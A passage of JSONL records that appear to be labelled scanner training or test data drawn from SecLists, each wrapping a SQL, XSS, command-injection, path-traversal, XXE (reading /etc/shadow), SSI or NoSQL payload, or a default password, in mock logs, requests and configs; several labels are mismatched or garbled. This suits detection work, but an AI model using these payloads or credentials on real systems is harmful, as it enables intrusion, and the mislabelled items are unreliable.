"injection_type": "SQL"}}]} {"id": "seclists_00099", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--", "injection_type": "SQL"}}]} {"id": "seclists_00100", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf /", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/", "injection_type": "cmd"}}]} {"id": "seclists_00101", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"script_uri\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"script_uri\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00102", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:nebraska@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "nebraska"}}]} {"id": "seclists_00103", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 0=0 #';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 #", "injection_type": "SQL"}}]} {"id": "seclists_00104", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:anderson@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "anderson"}}]} {"id": "seclists_00105", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ?x=\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?x=\"", "injection_type": "cmd"}}]} {"id": "seclists_00106", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=bigboss\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bigboss"}}]} {"id": "seclists_00107", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Basic JS breaker</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Basic JS breaker", "injection_type": "XSS"}}]} {"id": "seclists_00108", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"XML predicate XSS using content[n]\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "XML predicate XSS using content[n]", "injection_type": "XSS"}}]} {"id": "seclists_00109", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><span draggable=\"true\" ondragend=\"alert(1)\">test</span></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<span draggable=\"true\" ondragend=\"alert(1)\">test</span>", "injection_type": "XSS"}}]} {"id": "seclists_00110", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<foo></foo> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<foo></foo>", "injection_type": "cmd"}}]} {"id": "seclists_00111", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=0x730065006c0065006300740020004000400076006500 ... HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0x730065006c0065006300740020004000400076006500 ...", "injection_type": "SQL"}}]} {"id": "seclists_00112", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=& HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&", "injection_type": "LDAP"}}]} {"id": "seclists_00113", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<dfn ondblclick=\"alert(1)\">test</dfn>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn ondblclick=\"alert(1)\">test</dfn>", "injection_type": "XSS"}}]} {"id": "seclists_00114", "source": "seclists", "source_license": "MIT", "text": "password: Digital Equipment,2,operator,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,2,operator,"}}]} {"id": "seclists_00115", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=shibby\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "shibby"}}]} {"id": "seclists_00116", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%20echo%20MIJFWA$((64%2B47))$(echo%20MIJFWA)MIJFWA%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20MIJFWA$((64%2B47))$(echo%20MIJFWA)MIJFWA%26", "injection_type": "cmd"}}]} {"id": "seclists_00117", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", "injection_type": "cmd"}}]} {"id": "seclists_00118", "source": "seclists", "source_license": "MIT", "text": "filename='sqlattempt1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'sqlattempt1", "injection_type": "cmd"}}]} {"id": "seclists_00119", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\" or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_00120", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes slidein {}</style><image style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></image>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><image style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></image>", "injection_type": "XSS"}}]} {"id": "seclists_00121", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../../etc/passwd%00.jpg", "injection_type": "cmd"}}]} {"id": "seclists_00122", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ' or '1'='1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or '1'='1", "injection_type": "cmd"}}]} {"id": "seclists_00123", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\nid;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\nid;", "injection_type": "cmd"}}]} {"id": "seclists_00124", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or", "injection_type": "SQL"}}]} {"id": "seclists_00125", "source": "seclists", "source_license": "MIT", "text": "filename=%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26", "injection_type": "cmd"}}]} {"id": "seclists_00126", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <body <body onload=;;;;;al:eval('al'+'ert(1)');;></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <body <body onload=;;;;;al:eval('al'+'ert(1)');;>", "injection_type": "XSS"}}]} {"id": "seclists_00127", "source": "seclists", "source_license": "MIT", "text": "username=admin' or '&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or '", "injection_type": "SQL"}}]} {"id": "seclists_00128", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, html breaking, basic, title breaking</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, basic, title breaking", "injection_type": "XSS"}}]} {"id": "seclists_00129", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:BBR-4MG and,root,<N/A>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "BBR-4MG and,root,<N/A>,"}}]} {"id": "seclists_00130", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:UNIX,web,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,web,<BLANK>,"}}]} {"id": "seclists_00131", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{}</style><head style=\"animation-name:x\" onanimationstart=\"alert(1)\"></head>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><head style=\"animation-name:x\" onanimationstart=\"alert(1)\"></head>", "injection_type": "XSS"}}]} {"id": "seclists_00132", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<div draggable=\"true\" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu>", "injection_type": "XSS"}}]} {"id": "seclists_00133", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ',@variable';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ",@variable", "injection_type": "SQL"}}]} {"id": "seclists_00134", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: This vector is a basic URL breaker - embedding an alert in a URL-like wrapper. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector is a basic URL breaker - embedding an alert in a URL-like wrapper.", "injection_type": "XSS"}}]} {"id": "seclists_00135", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/shadow\" >]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_00136", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|id; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|id;", "injection_type": "cmd"}}]} {"id": "seclists_00137", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><track onmouseout=\"alert(1)\">test</track></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<track onmouseout=\"alert(1)\">test</track>", "injection_type": "XSS"}}]} {"id": "seclists_00138", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: or 0=0 #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 #", "injection_type": "cmd"}}]} {"id": "seclists_00139", "source": "seclists", "source_license": "MIT", "text": "filename=%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ", "injection_type": "cmd"}}]} {"id": "seclists_00140", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<th onbeforecut=\"alert(1)\" contenteditable>test</th> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<th onbeforecut=\"alert(1)\" contenteditable>test</th>", "injection_type": "XSS"}}]} {"id": "seclists_00141", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"site_htmlroot\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"site_htmlroot\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00142", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<br draggable=\"true\" ondragenter=\"alert(1)\">test</br>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br draggable=\"true\" ondragenter=\"alert(1)\">test</br>", "injection_type": "XSS"}}]} {"id": "seclists_00143", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=settings HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "settings", "injection_type": "SSTI"}}]} {"id": "seclists_00144", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%26%26echo$IFSVZSMDF$((4%2B77))$(echo$IFSVZSMDF)VZSMDF\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26%26echo$IFSVZSMDF$((4%2B77))$(echo$IFSVZSMDF)VZSMDF\\", "injection_type": "cmd"}}]} {"id": "seclists_00145", "source": "seclists", "source_license": "MIT", "text": "username=0x770061006900740066006F0072002000640065006C00 ...&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0x770061006900740066006F0072002000640065006C00 ...", "injection_type": "SQL"}}]} {"id": "seclists_00146", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=-- &password= HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-- &password=", "injection_type": "SQL"}}]} {"id": "seclists_00147", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{}</style><del style=\"animation-name:x\" onanimationend=\"alert(1)\"></del></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><del style=\"animation-name:x\" onanimationend=\"alert(1)\"></del>", "injection_type": "XSS"}}]} {"id": "seclists_00148", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><address id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></address></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><address id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></address>", "injection_type": "XSS"}}]} {"id": "seclists_00149", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<applet onclick=\"alert(1)\">test</applet>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<applet onclick=\"alert(1)\">test</applet>", "injection_type": "XSS"}}]} {"id": "seclists_00150", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00151", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><dfn onkeydown=\"alert(1)\" contenteditable>test</dfn></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn onkeydown=\"alert(1)\" contenteditable>test</dfn>", "injection_type": "XSS"}}]} {"id": "seclists_00152", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|echo%20DMMNWK$((14%2B86))$(echo%20DMMNWK)DMMNWK HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo%20DMMNWK$((14%2B86))$(echo%20DMMNWK)DMMNWK", "injection_type": "cmd"}}]} {"id": "seclists_00153", "source": "seclists", "source_license": "MIT", "text": "username=a'&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a'", "injection_type": "SQL"}}]} {"id": "seclists_00154", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<isindex action=javascript:alert(1) type=submit value=click>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex action=javascript:alert(1) type=submit value=click>", "injection_type": "XSS"}}]} {"id": "seclists_00155", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)", "injection_type": "XSS"}}]} {"id": "seclists_00156", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:LogiLink,admin,1234,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "LogiLink,admin,1234,"}}]} {"id": "seclists_00157", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf </foo>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "</foo>", "injection_type": "cmd"}}]} {"id": "seclists_00158", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = asc", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "asc", "injection_type": "SQL"}}]} {"id": "seclists_00159", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<mark id=x tabindex=1 onfocus=alert(1)></mark> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<mark id=x tabindex=1 onfocus=alert(1)></mark>", "injection_type": "XSS"}}]} {"id": "seclists_00160", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><time id=x tabindex=1 onbeforeactivate=alert(1)></time></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<time id=x tabindex=1 onbeforeactivate=alert(1)></time>", "injection_type": "XSS"}}]} {"id": "seclists_00161", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_00162", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%7Cecho%20ZZFTJX$((6%2B69))$(echo%20ZZFTJX)ZZFTJX//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho%20ZZFTJX$((6%2B69))$(echo%20ZZFTJX)ZZFTJX//", "injection_type": "cmd"}}]} {"id": "seclists_00163", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><image onmouseup=\"alert(1)\">test</image></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<image onmouseup=\"alert(1)\">test</image>", "injection_type": "XSS"}}]} {"id": "seclists_00164", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=</script><svg onload=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "</script><svg onload=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00165", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><embed onmouseleave=\"alert(1)\">test</embed></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<embed onmouseleave=\"alert(1)\">test</embed>", "injection_type": "XSS"}}]} {"id": "seclists_00166", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%201%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%201%20-ne%20%24%28echo%20PDVEEQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_00167", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:bounty", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bounty"}}]} {"id": "seclists_00168", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen>", "injection_type": "XSS"}}]} {"id": "seclists_00169", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ' or username like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or username like '%", "injection_type": "cmd"}}]} {"id": "seclists_00170", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:maria", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "maria"}}]} {"id": "seclists_00171", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='%3Becho$IFSTMWIFK$((5%2B69))$(echo$IFSTMWIFK)TMWIFK// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%3Becho$IFSTMWIFK$((5%2B69))$(echo$IFSTMWIFK)TMWIFK//", "injection_type": "cmd"}}]} {"id": "seclists_00172", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3Becho$IFSVSJXTC$((59%2B79))$(echo$IFSVSJXTC)VSJXTC%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSVSJXTC$((59%2B79))$(echo$IFSVSJXTC)VSJXTC%22", "injection_type": "cmd"}}]} {"id": "seclists_00173", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:AWARD,<BLANK>,zjaaadc,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AWARD,<BLANK>,zjaaadc,"}}]} {"id": "seclists_00174", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n{\"$gt\": \"\"}", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "{\"$gt\": \"\"}", "injection_type": "NoSQL"}}]} {"id": "seclists_00175", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<slot onpaste=\"alert(1)\" contenteditable>test</slot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<slot onpaste=\"alert(1)\" contenteditable>test</slot>", "injection_type": "XSS"}}]} {"id": "seclists_00176", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <script>alert(document.cookie)</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script>alert(document.cookie)</script>", "injection_type": "cmd"}}]} {"id": "seclists_00177", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><summary id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></summary></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><summary id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></summary>", "injection_type": "XSS"}}]} {"id": "seclists_00178", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\" or 1=1/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or 1=1/*", "injection_type": "SQL"}}]} {"id": "seclists_00179", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<h1 id=x tabindex=1 onfocusin=alert(1)></h1> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<h1 id=x tabindex=1 onfocusin=alert(1)></h1>", "injection_type": "XSS"}}]} {"id": "seclists_00180", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%5c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%5c", "injection_type": "cmd"}}]} {"id": "seclists_00181", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=' or 3=3 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 3=3", "injection_type": "SQL"}}]} {"id": "seclists_00182", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<applet draggable=\"true\" ondragenter=\"alert(1)\">test</applet>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<applet draggable=\"true\" ondragenter=\"alert(1)\">test</applet>", "injection_type": "XSS"}}]} {"id": "seclists_00183", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><rtc onmouseenter=\"alert(1)\">test</rtc></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rtc onmouseenter=\"alert(1)\">test</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_00184", "source": "seclists", "source_license": "MIT", "text": "password: EverFocus,supervisor,supervisor,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "EverFocus,supervisor,supervisor,"}}]} {"id": "seclists_00185", 